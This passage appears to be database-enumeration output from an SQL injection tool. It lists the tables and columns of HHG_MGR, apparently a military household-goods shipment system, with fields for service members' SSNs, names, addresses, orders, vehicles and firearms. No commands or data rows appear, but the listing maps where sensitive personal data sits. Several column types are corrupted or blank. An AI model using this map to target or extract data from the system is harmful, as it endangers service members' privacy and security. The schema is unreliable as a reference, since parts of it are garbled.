MEMBER_ORDERS [57 columns] +--------------------------------+----------+ | Column | Type | +--------------------------------+----------+ | ACCOMPANIED_TOUR_OVERSEAS | VARCHAR2 | | ACCOUNTING_CLASSIFICATION | VARCHAR2 | | ADMIN_RESTRICTED_WEIGHT | NUMBER | | ADMIN_WEIGHT_ADJUSTMENT | NUMBER | | APPROXIMATE_REPORTING_DATE | DATE | | CHARGE_WT_TO_SPON_MBR_ORDERS | VARCHAR2 | | COMBINED_MOVE_SPOUSE_IN_SERV | VARCHAR2 | | COUNSELOR_INITIALS | VARCHAR2 | | CURRENT_DUTY_STATION | VARCHAR2 | | DEPENDENT_TRAVEL_AUTHORIZED | VARCHAR2 | | DEPENDENT_TRAVEL_CONCURRENT | VARCHAR2 | | DEPENDENT_TRAVEL_DELAYED | VARCHAR2 | | DEPENDENT_UB_TABULAR_WEIGHT | NUMBER | | DEPLOYMENT_MOVE | VARCHAR2 | | FULL_JTR_TABULAR_WEIGHT_PCS | NUMBER | | FULL_JTR_TABULAR_WEIGHT_TDY | NUMBER | | IB_FILE_FOLDER_LABEL_PRINTED | VARCHAR2 | | JOINT_MOVE_SPOUSE_IN_SERVICE | VARCHAR2 | | MBR_CHOOSES_UB_SURFACE_ALTERN | VARCHAR2 | | MEMBER_BRANCH_OF_SERVICE | VARCHAR2 | | MEMBER_FISCAL_YEAR_OF_DETACH | NUMBER | | MEMBER_IN_PAY_STATUS_AT_DEST | VARCHAR2 | | MEMBER_MOVING_TO_GOVT_HOUSING | VARCHAR2 | | MEMBER_NAVY_RANK_RATE_CODE | VARCHAR2 | | MEMBER_OVER_2_YEARS_SERVICE | VARCHAR2 | | MEMBER_PAY_GRADE | VARCHAR2 | | MEMBER_RANK | VARCHAR2 | | MEMBER_UB_TABULAR_WEIGHT | NUMBER | | MOVEMENT_DESIGNATOR_CODE | VARCHAR2 | | NAVY_NMF_CODE | VARCHAR2 | | NEW_DUTY_STATION | VARCHAR2 | | NTS_FILE_FOLDER_LABEL_PRINTED | VARCHAR2 | | NUMBER_OF_DEPENDENTS_UNDER_12 | NUMBER | | NUMBER_OF_DEPN_12_AND_OVER | NUMBER | | OB_FILE_FOLDER_LABEL_PRINTED | VARCHAR2 | | OLD_ISSUING_HQTRS | VARCHAR2 | | OLD_ORDERS_DATE | DATE | | ORDERS_AMENDED | VARCHAR2 | | ORDERS_DATE | DATE | | ORDERS_ISSUING_HEADQUARTERS | VARCHAR2 | | ORDERS_PARAGRAPH_NUMBER | VARCHAR2 | | ORDERS_SERIAL_KEY | NUMBER | | PCS_WITH_TDY_INDICATOR | VARCHAR2 | | RETIREMENT_SEPARATION_DATE | DATE | | SPONSORED_DEPENDENT_FIRST_NAME | VARCHAR2 | | SPONSORED_DEPENDENT_LAST_NAME | VARCHAR2 | | SPONSORED_DEPENDENT_MOVE | VARCHAR2 | | SPONSORED_DEPN_MID_NAM_OR_INIT | VARCHAR2 | | SPONSORING_MBR_ORDERS_NUMBER | VARCHAR2 | | SPONSORING_MEMBER_ORDERS_DATE | DATE | | TIMESTAMP | DATE | | TOUR_OVERSEAS | VARCHAR2 | | TRANSPORTATION_ACCOUNT_CODE | VARCHAR2 | | TYPE_OF_ORDERS | VARCHAR2 | | UB_WEIGHT_ADJUSTMENT | NUMBER | | UNIT_GAINING_MEMBER | VARCHAR2 | | UNIT_LOSING_MEMBER | VARCHAR2 | +--------------------------------+----------+ Database: HHG_MGR Table: MOBILE_HOMES [17 columns] +--------------------+----------+ | Column | Type | +--------------------+----------+ | MOBH_ADDRESS | VARCHAR2 | | MOBH_CITY | VARCHAR2 | | MOBH_COUNTRY | VARCHAR2 | | MOBH_EXPANDABLE | VARCHAR2 | | MOBH_HEIGHT | VARCHAR2 | | MOBH_LENGTH | VARCHAR2 | | MOBH_MAKE | VARCHAR2 | | MOBH_MODEL | VARCHAR2 | | MOBH_STATE | VARCHAR2 | | MOBH_TRANSPORTABLE | VARCHAR2 | | MOBH_TYPE | VARCHAR2 | | MOBH_WIDTH | VARCHAR2 | | MOBH_YEAR | NUMBER | | MOBH_ZIPCODE | VARCHAR2 | | MOBH_ZIPCODE_EXT | VARCHAR2 | | ORDERS_SERIAL_KEY | NUMBER | | SHIPMENT_NUMBER | NUMBER | +--------------------+----------+ Database: HHG_MGR Table: MOVE_INFO [9 columns] +--------------------+----------+ | Column | Type | +--------------------+----------+ | DUPLICATE | CHAR | | IN_GOVT_STORAGE | VARCHAR2 | | MEMB_SSN | VARCHAR2 | | MOVE_TYPE | VARCHAR2 | | OCONUS_MOVE | VARCHAR2 | | ORDERS_SERIAL_KEY | NUMBER | | RECENT_MOVE | VARCHAR2 | | WEIGHT_ENTITLEMENT | NUMBER | | YEARS_IN_SERVICE | VARCHAR2 | +--------------------+----------+ Database: HHG_MGR Table: NEW_DUTY_STATION_INFO [16 columns] +-------------------+----------+ | Column | Type | +-------------------+----------+ | ARRIVAL_DATE | DATE | | CITY | VARCHAR2 | | COUNTRY | VARCHAR2 | | DSN | VARCHAR2 | | DUPLICATE | CHAR | | HOMEPORT | VARCHAR2 | | MEMB_SSN | VARCHAR2 | | NEW_DUTY_STATION | VARCHAR2 | | ORDERS_SERIAL_KEY | NUMBER | | RECEIPT_DATE | DATE | | STATE | VARCHAR2 | | STREET_ADDRESS | VARCHAR2 | | WORK_PHONE | VARCHAR2 | | WORK_PHONE_EXT | VARCHAR2 | | ZIPCODE | VARCHAR2 | | ZIPCODE_EXT | VARCHAR2 | +-------------------+----------+ Database: HHG_MGR Table: NTS_EXTENSION_SHIPMENT [9 columns] +----------------------+----------+ | Column | Type | +----------------------+----------+ | DATE_OF_STORAGE | DATE | | DATE_TO_EXTENSION | DATE | | LOT_NUMBER | VARCHAR2 | | NTS_LOCATION_NUMBER | NUMBER | | ORDERS_SERIAL_KEY | NUMBER | | RESPONSIBLE_PPO | VARCHAR2 | | SERVICE_ORDER_NUMBER | VARCHAR2 | | SHIPMENT_NUMBER | NUMBER | | WEIGHT | VARCHAR2 | +----------------------+----------+ Database: HHG_MGR Table: NTS_RELEASE_SHIPMENT [9 columns] +----------------------+----------+ | Column | Type | +----------------------+----------+ | DATE_OF_STORAGE | DATE | | DATE_TO_RELEASE | DATE | | LOT_NUMBER | VARCHAR2 | | NTS_LOCATION_NUMBER | NUMBER | | ORDERS_SERIAL_KEY | NUMBER | | RESPONSIBLE_PPO | VARCHAR2 | | SERVICE_ORDER_NUMBER | VARCHAR2 | | SHIPMENT_NUMBER | NUMBER | | WEIGHT | VARCHAR2 | +----------------------+----------+ Database: HHG_MGR Table: NTS_SHIPMENT [65 columns] +--------------------------------+----------+ | Column | Type | +--------------------------------+----------+ | CURRENT_NTS_PRO_GEAR_WT | NUMBER | | CURRENT_NTS_STORED_WT | NUMBER | | DATE_CONVERTED_TO_MBR_EXPENSE | DATE | | DATE_NEW_APPROP_EFFECTIVE | DATE | | DATE_NTS_EXPIR_LETTER1_PRINTED | DATE | | DATE_NTS_EXPIR_LETTER2_PRINTED | DATE | | DATE_NTS_EXTENSION_AUTHORIZED | DATE | | DATE_QTRLY_STG_INVOICE_PRINTED | DATE | | ESTIMATED_NTS_REMOVAL_DATE | DATE | | ESTIMATED_PERIOD_OF_NTS | NUMBER | | FINANCE_OFFICE_CODE | VARCHAR2 | | HHG_ALT_CONTACT_NAME | VARCHAR2 | | HHG_ALT_CONTACT_PHONE_COM | VARCHAR2 | | HHG_ALT_CONTACT_PHONE_DSN | VARCHAR2 | | HHG_ALT_CONTACT_PHONE_EXT | VARCHAR2 | | HHG_LT_CONTACT_RELATIONSHIP | VARCHAR2 | | MBR_PERM_ADDR_CARE_OF_NAME | VARCHAR2 | | MBR_PERMANENT_ADDR_CITY | VARCHAR2 | | MBR_PERMANENT_ADDR_COUNTRY | VARCHAR2 | | MBR_PERMANENT_ADDR_PH_COM | VARCHAR2 | | MBR_PERMANENT_ADDR_PH_DSN | VARCHAR2 | | MBR_PERMANENT_ADDR_PHONE_EXT | VARCHAR2 | | MBR_PERMANENT_ADDR_STATE | VARCHAR2 | | MBR_PERMANENT_ADDR_STREET | VARCHAR2 | | MBR_PERMANENT_ADDR_ZIP_APO_FPO | VARCHAR2 | | MINIMUM_WEIGHT_VALUE | NUMBER | | NEW_APPROPRIATION_IDENT_CODE | VARCHAR2 | | NTS_ACTION | VARCHAR2 | | NTS_APPROPRIATION_IDENT_CODE | VARCHAR2 | | NTS_BOA_MOD_NUMBER | VARCHAR2 | | NTS_BOA_MOD_STATUS_CODE | VARCHAR2 | | NTS_BOA_NUMBER | VARCHAR2 | | NTS_CONSTR_WT_USED_INDICATOR | VARCHAR2 | | NTS_CONTRACTOR_CODE | VARCHAR2 | | NTS_ENTITLEMT_EXPIRATION_DATE | DATE | | NTS_EXT_AUTH | VARCHAR2 | | NTS_EXTENSION_AUTHORITY | VARCHAR2 | | NTS_EXTENSION_REASON | VARCHAR2 | | NTS_FEDERAL_AGENCY | VARCHAR2 | | NTS_LOT_NUMBER | VARCHAR2 | | NTS_MULT_SHIPMT_SEQ_NUM | NUMBER | | NTS_PENDING_OVERSEAS_SHIPMENT | VARCHAR2 | | NTS_PRO_GEAR_AUTHORIZED | VARCHAR2 | | NTS_RESPONSIBLE_GBLOC | VARCHAR2 | | NTS_SERVICE_ORDER_NUMBER | VARCHAR2 | | NTS_TYPE | VARCHAR2 | | NUMBER_OF_MONTHS_NTS_AUTH | NUMBER | | OLD_BOA_MOD_NUMBER | VARCHAR2 | | OLD_BOA_NUMBER | VARCHAR2 | | OLD_CONTRACTOR_CODE | VARCHAR2 | | OLD_DATE_APPROP_EFFECTIVE | DATE | | OLD_ENTITLEMT_EXPIR_DATE | DATE | | OLD_MONTHS_AUTH | NUMBER | | OLD_NTS_BOA_MOD_STATUS_CODE | VARCHAR2 | | OLD_NTS_LOT_NUMBER | VARCHAR2 | | OLD_NTS_SERVICE_ORDER_NUMBER | VARCHAR2 | | ORDERS_SERIAL_KEY | NUMBER | | PART_OF_DEPLOYMENT_INDICATOR | VARCHAR2 | | SHIPMENT_NUMBER | NUMBER | | SPECIAL_RATE_REQUIRED | VARCHAR2 | | SPECTRANS_STG_FAC_ID | VARCHAR2 | | SPECTRANS_TCD_UPDATED | VARCHAR2 | | STG_PERIOD_BEFORE_NEW_APPROP | NUMBER | | STORAGE_FACILITY_ID | VARCHAR2 | | WGT_STORED_AT_MBR_EXPENSE | NUMBER | +--------------------------------+----------+ Database: HHG_MGR Table: ORDERS_MASTER [8 columns] +-----------------------+----------+ | Column | Type | +-----------------------+----------+ | MBR_OSK | NUMBER | | MEMB_FIRST_NAME | VARCHAR2 | | MEMB_LAST_NAME | VARCHAR2 | | MEMB_MID_NAME_OR_INIT | VARCHAR2 | | MEMB_SSN | VARCHAR2 | | OLD_ORDERS_NUMBER | VARCHAR2 | | ORDERS_NUMBER | VARCHAR2 | | ORDERS_SERIAL_KEY | NUMBER | +-----------------------+----------+ Database: HHG_MGR Table: PERSONNEL [18 columns] +-----------------------+----------+ | Column | Type | +-----------------------+----------+ | ALT_DSN | VARCHAR2 | | ALT_PHONE | VARCHAR2 | | ALT_PHONE_EXT | VARCHAR2 | | DSN | VARCHAR2 | | EFFECTIVE_DATE | DATE | | EFFECTIVE_DELETE_DATE | DATE | | EMAIL | VARCHAR2 | | FAX | VARCHAR2 | | FIRST_NAME | VARCHAR2 | | INITIALS | VARCHAR2 | | LAST_NAME | VARCHAR2 | | MID_NAME_OR_INIT | VARCHAR2 | | PROCESSING_CENTER | VARCHAR2 | | SUPERVISOR_ID | VARCHAR2 | | TEAM_ID | VARCHAR2 | | USERNAME | VARCHAR2 | | WORK_PHONE | VARCHAR2 | | WORK_PHONE_EXT | VARCHAR2 | +-----------------------+----------+ Database: HHG_MGR Table: POINT_OF_CONTACT [14 columns] +-------------------+----------+ | Column | Type | +-------------------+----------+ | CITY | VARCHAR2 | | CONTACT_NAME | VARCHAR2 | | CONTACT_TYPE | VARCHAR2 | | COUNTRY | VARCHAR2 | | DSN | VARCHAR2 | | DUPLICATE | CHAR | | MEMB_SSN | VARCHAR2 | | ORDERS_SERIAL_KEY | NUMBER | | PHONE | VARCHAR2 | | PHONE_EXT | VARCHAR2 | | STATE | VARCHAR2 | | STREET_ADDRESS | VARCHAR2 | | ZIPCODE | VARCHAR2 | | ZIPCODE_EXT | VARCHAR2 | +-------------------+----------+ Database: HHG_MGR Table: POV [9 columns] +----------------------------+----------+ | Column | Type | +----------------------------+----------+ | IS_POV_DRIVABLE | VARCHAR2 | | ORDERS_SERIAL_KEY | NUMBER | | POV_IDENTIFICATION_NUMBER | VARCHAR2 | | POV_LICENSE_NUMBER | VARCHAR2 | | POV_LICENSE_STATE_OF_ISSUE | VARCHAR2 | | POV_MAKE | VARCHAR2 | | POV_MODEL | VARCHAR2 | | POV_YEAR | NUMBER | | SHIPMENT_NUMBER | NUMBER | +----------------------------+----------+ Database: HHG_MGR Table: PPCIG_CUSTOMS_CLEARANCE [5 columns] +-------------------+--------+ | Column | Type | +-------------------+--------+ | CUSTOMS_ID | NUMBER | | DD1434 | CLOB | | GENERAL_INS | CLOB | | INTRATHEATER_SHIP | CLOB | | PERSONAL_PROPERTY | CLOB | +-------------------+--------+ Database: HHG_MGR Table: PPCIG_CUSTOMS_CLEARANCE_SPEC [3 columns] +--------------+----------+ | Column | Type | +--------------+----------+ | CUSTOMS_ID | NUMBER | | INSTRUCTIONS | CLOB | | SUBJECT | VARCHAR2 | +--------------+----------+ Database: HHG_MGR Table: PPCIG_ELECTRICAL_EQUIPMENT [5 columns] +---------------+--------+ | Column | Type | +---------------+--------+ | ELECTRICAL_ID | NUMBER | | HOME_PC | CLOB | | OTHER | CLOB | | RADIO | CLOB | | TVS | CLOB | +---------------+--------+ Database: HHG_MGR Table: PPCIG_ELECTRIC_EQUIPMENT_SPEC [4 columns] +---------------+----------+ | Column | Type | +---------------+----------+ | ELECTRICAL_ID | NUMBER | | GBLOC | VARCHAR2 | | INSTRUCTIONS | CLOB | | SUBJECT | VARCHAR2 | +---------------+----------+ Database: HHG_MGR Table: PPCIG_FIREARMS [6 columns] +-------------+--------+ | Column | Type | +-------------+--------+ | FIREARMS_ID | NUMBER | | GENERAL_INS | CLOB | | HANDGUNS | CLOB | | OTHER | CLOB | | RIFLES | CLOB | | TOY_GUNS | CLOB | +-------------+--------+ Database: HHG_MGR Table: PPCIG_POV [15 columns] +----------------------+--------+ | Column | Type | +----------------------+--------+ | CONSIGNMENT | CLOB | | DOCUMENTATION | CLOB | | GASOLINE_INS | CLOB | | GENERAL_INS | CLOB | | INSURANCE_INS | CLOB | | MODIFIED_VEHICLE | CLOB | | MOTORCYCLE_INS | CLOB | | OTHER | CLOB | | POV_ID | NUMBER | | REGISTRATION | CLOB | | REPAIRS | CLOB | | SAFETY_REQUIREMENTS | CLOB | | SNOW | CLOB | | VEHICLE_AVAILABILITY | CLOB | | WAIVERS | CLOB | +----------------------+--------+ Database: HHG_MGR Table: PPCIG_SERVICE_CODE [2 columns] +--------------+----------+ | Column | Type | +--------------+----------+ | DESCRIPTION | VARCHAR2 | | SERVICE_CODE | VARCHAR2 | +--------------+----------+ Database: HHG_MGR Table: PPCIG_SHIP_INSTRUCTIONS [6 columns] +---------------------+--------+ | Column | Type | +---------------------+--------+ | CONTAINER | CLOB | | GENERAL_WEIGHT_INFO | CLOB | | HARD_LIFT | CLOB | | OTHER | CLOB | | SHIP_INS_ID | NUMBER | | UNACCOMPANIED_BAG | CLOB | +---------------------+--------+ Database: HHG_MGR Table: PPCIG_SHIP_INSTRUCTIONS_SPEC [4 columns] +--------------+----------+ | Column | Type | +--------------+----------+ | GBLOC | VARCHAR2 | | INSTRUCTIONS | CLOB | | SHIP_INS_ID | NUMBER | | SUBJECT | VARCHAR2 | +--------------+----------+ Database: HHG_MGR Table: PPCIG_TRANSMIT_EQUIPMENT [6 columns] +-------------------+--------+ | Column | Type | +-------------------+--------+ | AMATEUR_HAM_RADIO | CLOB | | CB | CLOB | | CORDLESS_PHONE | CLOB | | DISH | CLOB | | MARS_EQUIPMENT | CLOB | | TRANSMIT_ID | NUMBER | +-------------------+--------+ Database: HHG_MGR Table: PPCIG_TRANSMIT_EQUIP_SITE_SPEC [4 columns] +--------------+----------+ | Column | Type | +--------------+----------+ | GBLOC | VARCHAR2 | | INSTRUCTIONS | CLOB | | SUBJECT | VARCHAR2 | | TRANSMIT_ID | NUMBER | +--------------+----------+ Database: HHG_MGR Table: PPM_INFO [11 columns] +---------------------------+----------+ | Column | Type | +---------------------------+----------+ | AUTH_DESTINATION_CITY | VARCHAR2 | | AUTH_DESTINATION_STATE | VARCHAR2 | | AUTH_ORIGIN_CITY | VARCHAR2 | | AUTH_ORIGIN_STATE | VARCHAR2 | | EST_SPOUSE_PRO_GEAR | NUMBER | | ESTIMATED_PRO_GEAR_WEIGHT | NUMBER | | ESTIMATED_WEIGHT | NUMBER | | MOVE_DATE | DATE | | MOVE_NUMBER | NUMBER | | ORDERS_SERIAL_KEY | NUMBER | | SHIPMENT_NUMBER | NUMBER | +---------------------------+----------+ Database: HHG_MGR Table: PROCESSING_CENTERS [8 columns] +-------------------+----------+ | Column | Type | +-------------------+----------+ | BRANCH_OF_SERVICE | VARCHAR2 | | COUNTRY_CODE | VARCHAR2 | | COUNTY_CITY_IND | VARCHAR2 | | COUNTY_CITY_NAME | VARCHAR2 | | DESCRIPTION | VARCHAR2 | | GBLOC | VARCHAR2 | | GMT_DIFFERENCE | NUMBER | | STATE | VARCHAR2 | +-------------------+----------+ Database: HHG_MGR Table: RELEASE_ITEMS [4 columns] +-------------------+----------+ | Column | Type | +-------------------+----------+ | DESCRIPTION | VARCHAR2 | | ITEM_NBR | NUMBER | | ORDERS_SERIAL_KEY | NUMBER | | SHIPMENT_NUMBER | NUMBER | +-------------------+----------+ Database: HHG_MGR Table: SHIPMENT [96 columns] +--------------------------------+----------+ | Column | Type | +--------------------------------+----------+ | ADDITIONAL_SERVICE_REQUIRED | VARCHAR2 | | AGENT_CODE | VARCHAR2 | | AUTHORIZED_DISTANCE | NUMBER | | BLUEBARK_MIA_AUTH_SIGNER_NAME | VARCHAR2 | | BLUEBARK_MIA_AUTH_SIGNER_TITLE | VARCHAR2 | | CANCEL_OUTBOUND_PART_OF_SHIPMT | VARCHAR2 | | CARRIER_CODE | VARCHAR2 | | CODE_OF_SERVICE | VARCHAR2 | | CODE_OF_SERVICE_FOR_EXCESS_EST | VARCHAR2 | | CONS_SHIP_NO | VARCHAR2 | | CONSUMABLES_AUTHORIZED | VARCHAR2 | | DATE_CANCELLATION_REQUESTED | DATE | | DATE_COMPLETE_SHIPMENT_ARRIVED | DATE | | DATE_FAX_PRINTED | DATE | | DATE_GBL_PRINTED | DATE | | DATE_SERV_NOTE_PRINTED | DATE | | DATE_SHIPMENT_COUNSELED | DATE | | DATE_SHIPMENT_PICKED_UP | DATE | | DECLARED_VALUATION_AMOUNT | NUMBER | | DEPLOYMENT_MOVE_NUMBER | VARCHAR2 | | DESTINATION_DPM_ZONE | VARCHAR2 | | DESTINATION_GBLOC | VARCHAR2 | | DESTINATION_RATE_AREA | VARCHAR2 | | DIRECT_DELIVERY_REQUESTED | VARCHAR2 | | DPM_SHIPMENT_IND | VARCHAR2 | | DPM_ZONE | VARCHAR2 | | DTGBL_ORIGIN_ZONE | VARCHAR2 | | EXCESS_COST_ESTIMATE | NUMBER | | EXCESS_COST_PRECOLLECTED | NUMBER | | EXCESS_COST_TO_PRECOLLECT | NUMBER | | EXCESS_COSTS_EXIST | VARCHAR2 | | EXPENSIVE_ITEMS_NO_OF_CARTONS | NUMBER | | EXPORT_SHIPMENT_INFO_TO_DEST | VARCHAR2 | | GBL_NUMBER | VARCHAR2 | | GOCS_ORDERED | VARCHAR2 | | INSPECTION_REQUESTED_AT_DEST | VARCHAR2 | | IS_OCONUS | VARCHAR2 | | LOCAL_MOVE_INDICATOR | VARCHAR2 | | MBR_CODE_MODE_PREFERENCE | VARCHAR2 | | MBR_REQUESTED_DELIVERY_DATE | DATE | | MBR_REQUESTED_PICKUP_DATE | DATE | | MBR_WILLING_TO_PAY_C_C_PREFER | VARCHAR2 | | MBR_WILLING_TO_PAY_CODE_PREFER | VARCHAR2 | | MEMBER_REQUESTED_PACK_DATE | DATE | | MEMBER_REQUESTED_PACK_DATE_2 | DATE | | MEMBER_REQUESTED_PACK_DATE_3 | DATE | | METHOD_OF_SHIPMENT | VARCHAR2 | | NTS_MULT_SHIPMT_IND | VARCHAR2 | | NTS_MULT_SHIPMT_SEQ_NUM | NUMBER | | NTS_MULT_UNPACKING_REQUIRED | VARCHAR2 | | NUMBER_OF_SPLIT_PORTIONS | NUMBER | | OLD_SHIPMT_ACCT_CLASS | VARCHAR2 | | ONE_TIME_ONLY_INDICATOR | VARCHAR2 | | OPERATING_ALLOW_AMOUNT_ADVANCE | NUMBER | | OPERATING_ALLOWANCE_AMOUNT | NUMBER | | ORDERS_SERIAL_KEY | NUMBER | | ORIGIN_GBLOC | VARCHAR2 | | ORIGIN_PPPO | VARCHAR2 | | ORIGIN_RATE_AREA | VARCHAR2 | | PARCEL_CONSIGNED_TO_DEST_ITO | VARCHAR2 | | PARCEL_REGISTERED_CERT_NUMBER | VARCHAR2 | | PARCEL_SERVICE_DATE_SENT | DATE | | PARCEL_SERVICE_METHOD | VARCHAR2 | | PARTIAL_DELIVERY_REQUESTED | VARCHAR2 | | PM_ADVANCE | CHAR | | PM_TAXES_STATE | CHAR | | POWER_OF_ATTORNEY_NAME | VARCHAR2 | | POWER_OF_ATTORNEY_RELATIONSHIP | VARCHAR2 | | RELEASED_VALUATION_OPTION | VARCHAR2 | | REMOTE_STAT_NUM_CODE | VARCHAR2 | | REQUESTED_DISTANCE | NUMBER | | REQUIRED_DELIVERY_DATE | DATE | | RESIDENT_PKUP_NUM | NUMBER | | REWEIGH_NUMBER | VARCHAR2 | | REWEIGH_REQUESTED_AT_DEST | VARCHAR2 | | RS_WGT_CHARGE_AGAINST_ENTITLE | VARCHAR2 | | SHIPMENT_CONTAINS_FIREARMS | VARCHAR2 | | SHIPMENT_CONTAINS_MOTORCYCLE | VARCHAR2 | | SHIPMENT_CONTAINS_POV | VARCHAR2 | | SHIPMENT_NUMBER | NUMBER | | SHIPMENT_OUT_OF_NTS | VARCHAR2 | | SHIPMENT_OUT_OF_P_AND_C | VARCHAR2 | | SHIPMENT_STATUS_CODE | VARCHAR2 | | SHIPMENT_STATUS_DATE | DATE | | SHIPMT_ACCOUNT_CLASSIFICATION | VARCHAR2 | | SHIPMT_CANCELLATION_REQUESTED | VARCHAR2 | | SPECIAL_SHIPMENT_CIRCUMSTANCE | VARCHAR2 | | SPLIT_SHIPMENT_INDICATOR | VARCHAR2 | | TDY_SEGMENT_INDICATOR | VARCHAR2 | | TIME_FAX_PRINTED | VARCHAR2 | | TIMESTAMP | DATE | | TRANSPORTATION_CONTROL_NUMBER | VARCHAR2 | | TYPE_OF_SHIPMENT | VARCHAR2 | | VOLUME_MOVE_NUMBER | VARCHAR2 | | WT_CHARGEABLE_AGAINST_ENTITLE | VARCHAR2 | | Z_TONNAGE_INDICATOR | VARCHAR2 | +--------------------------------+----------+ Database: HHG_MGR Table: SHIPMENT_SUPPLEMENT [22 columns] +------------------------+----------+ | Column | Type | +------------------------+----------+ | GS_RELEASE_TYPE | VARCHAR2 | | GS_REQUEST_STORAGE_EXT | VARCHAR2 | | NUM_PACK_DAYS | NUMBER | | ORDERS_SERIAL_KEY | NUMBER | | PROF_BOOKS_EQUIP | VARCHAR2 | | REQ_DELIV_DATE | DATE | | REQ_PICKUP_DATE_1 | DATE | | REQ_PICKUP_DATE_2 | DATE | | REQ_PICKUP_DATE_3 | DATE | | SHIPMENT_NUMBER | NUMBER | | SHIPMENT_TYPE | VARCHAR2 | | SI_BOAT | VARCHAR2 | | SI_GASOLINE_APPLIANCES | VARCHAR2 | | SI_JETSKI | VARCHAR2 | | SI_MOBILEHOME | VARCHAR2 | | SI_PIANO | VARCHAR2 | | SI_PLASMA | VARCHAR2 | | SI_PROPANE_TANK | VARCHAR2 | | SI_SCUBA | VARCHAR2 | | SI_UNUSUAL_OVERSIZE | VARCHAR2 | | SI_UTILITY_TRAILER | VARCHAR2 | | SI_WASHING_MACHINE | VARCHAR2 | +------------------------+----------+ Database: HHG_MGR Table: SHIP_ADDL_ADDRESSES [36 columns] +--------------------------------+----------+ | Column | Type | +--------------------------------+----------+ | ADDL_DEL_DESIG_AGENT_NAME | VARCHAR2 | | ADDL_DEL_DESIG_AGENT_PH_COM | VARCHAR2 | | ADDL_DEL_DESIG_AGENT_PH_DSN | VARCHAR2 | | ADDL_DEL_DESIG_AGENT_PHONE_EXT | VARCHAR2 | | ADDL_DEL_DESIG_AGENT_RELATN | VARCHAR2 | | ADDL_DELIVERY_ADDR_CITY | VARCHAR2 | | ADDL_DELIVERY_ADDR_PHONE | VARCHAR2 | | ADDL_DELIVERY_ADDR_PHONE_EXT | VARCHAR2 | | ADDL_DELIVERY_ADDR_STATE | VARCHAR2 | | ADDL_DELIVERY_ADDR_STREET | VARCHAR2 | | ADDL_DELIVERY_ADDR_ZIP_APO_FPO | VARCHAR2 | | ADDL_DELIVERY_COUNTRY | VARCHAR2 | | ADDL_DELIVERY_COUNTY | VARCHAR2 | | ADDL_PICKUP_ADDR_CITY | VARCHAR2 | | ADDL_PICKUP_ADDR_PHONE_NUMBER | VARCHAR2 | | ADDL_PICKUP_ADDR_STATE | VARCHAR2 | | ADDL_PICKUP_ADDR_STREET | VARCHAR2 | | ADDL_PICKUP_ADDR_ZIP_APO_FPO | VARCHAR2 | | ADDL_PICKUP_COUNTRY | VARCHAR2 | | ADDL_PICKUP_COUNTY | VARCHAR2 | | ADDL_PICKUP_DESIG_AGENT_NAME | VARCHAR2 | | ADDL_PICKUP_DESIG_AGENT_PH_COM | VARCHAR2 | | ADDL_PICKUP_DESIG_AGENT_PH_DSN | VARCHAR2 | | ADDL_PICKUP_DESIG_AGENT_RELATN | VARCHAR2 | | ADDL_PUP_ADDR_PHONE_NUMBER_EXT | VARCHAR2 | | ADDL_PUP_DESIG_AGENT_PHONE_EXT | VARCHAR2 | | ADDL_SERVICE_LOCATION | VARCHAR2 | | HHG_XTRA_DELIV_ALT_CNT_PH_COM | VARCHAR2 | | HHG_XTRA_DELIV_ALT_CNT_PH_DSN | VARCHAR2 | | HHG_XTRA_DELIV_TYPE | VARCHAR2 | | HHG_XTRA_DELIV_WORK_PHONE_COM | VARCHAR2 | | HHG_XTRA_DELIV_WORK_PHONE_DSN | VARCHAR2 | | HHG_XTRA_DELIV_WORK_PHONE_EXT | VARCHAR2 | | HHGXTRA_DDELIV_ALT_CNT_NAME | | | ORDERS_SERIAL_KEY | NUMBER | | SHIPMENT_NUMBER | NUMBER | +--------------------------------+----------+ Database: HHG_MGR Table: SHIP_ADDRESSES [45 columns] +--------------------------------+----------+ | Column | Type | +--------------------------------+----------+ | AUTHORIZED_DEST_ZIP_APO_FPO | VARCHAR2 | | AUTHORIZED_DESTINATION_CITY | VARCHAR2 | | AUTHORIZED_DESTINATION_COUNTRY | VARCHAR2 | | AUTHORIZED_DESTINATION_COUNTY | VARCHAR2 | | AUTHORIZED_DESTINATION_STATE | VARCHAR2 | | AUTHORIZED_ORIGIN_CITY | VARCHAR2 | | AUTHORIZED_ORIGIN_COUNTRY | VARCHAR2 | | AUTHORIZED_ORIGIN_COUNTY | VARCHAR2 | | AUTHORIZED_ORIGIN_STATE | VARCHAR2 | | AUTHORIZED_ORIGIN_ZIP_APO_FPO | VARCHAR2 | | DELIVERY_ADDR_PHONE_NUMBER_EXT | VARCHAR2 | | DELIVERY_ADDRESS_CITY | VARCHAR2 | | DELIVERY_ADDRESS_PHONE_NUMBER | VACCHAR2 | | DELIVERY_ADDRESS_STATE | VARCHAR2 | | DELIVERY_ADDRESS_STREET | VARCHAR2 | | DELIVERY_ADDRESS_ZIP_APO_FPO | VARCHAR2 | | DELIVERY_COUNTRY | VARCHAR2 | | DELIVERY_COUNTY | VARCHAR2 | | DELIVERY_DESIG_AGENT_NAME | VARCHAR2 | | DELIVERY_DESIG_AGENT_PHONE_COM | VARCHAR2 | | DELIVERY_DESIG_AGENT_PHONE_DSN | CR2CHAR2 | | DELIVERY_DESIG_AGENT_PHONE_EXT | VARCHAR2 | | DELIVERY_DESIG_AGENT_RELATN | VARCHAR2 | | HHG_ALT_CONTACT_PHONE_COM | VARCHAR2 | | HHG_ALT_CONTACT_PHONE_EXT | VARCHAR2 | | HHG_ALT_CONTT_P_PHONE_DSN | | | HHG_WORK_PHONE_COM | VARCHAR2 | | HHG_WORK_PHONE_DSN | VARCHAR2 | | HHG_WORK_PHONE_EXT | VARCHAR2 | | ORDERS_SERIAL_KEY | NUMBER | | PICKUP_ADDR_PHONE_NUMBER_EXT | VARCHAR2 | | PICKUP_ADDRESS_CITY | VARCHAR2 | | PICKUP_ADDRESS_PHONE_NUMBER | VARCHAR2 | | PICKUP_ADDRESS_STATE | VARCHAR2 | | PICKUP_ADDRESS_STREET | VARCHAR2 | | PICKUP_ADDRESS_ZIP_APO_FPO | VARCHAR2 | | PICKUP_COUNTRY | VARCHAR2 | | PICKUP_COUNTY | VARCHAR2 | | PICKUP_DESIG_AGENT_NAME | VARCHAR2 | | PICKUP_DESIG_AGENT_PHONE_COM | VARCHAR2 | | PICKUP_DESIG_AGENT_PHONE_DSN | VARCHAR2 | | PICKUP_DESIG_AGENT_PHONE_EXT | VARCHAR2 | | PICKUP_DESIG_AGENT_RELATN | VARCHAR2 | | SHIPMENT_NUMBER | NUMBER | | UNUSUAL_PICKUP_SPECIFICS | VARCHAR2 | +--------------------------------+----------+ Database: HHG_MGR Table: 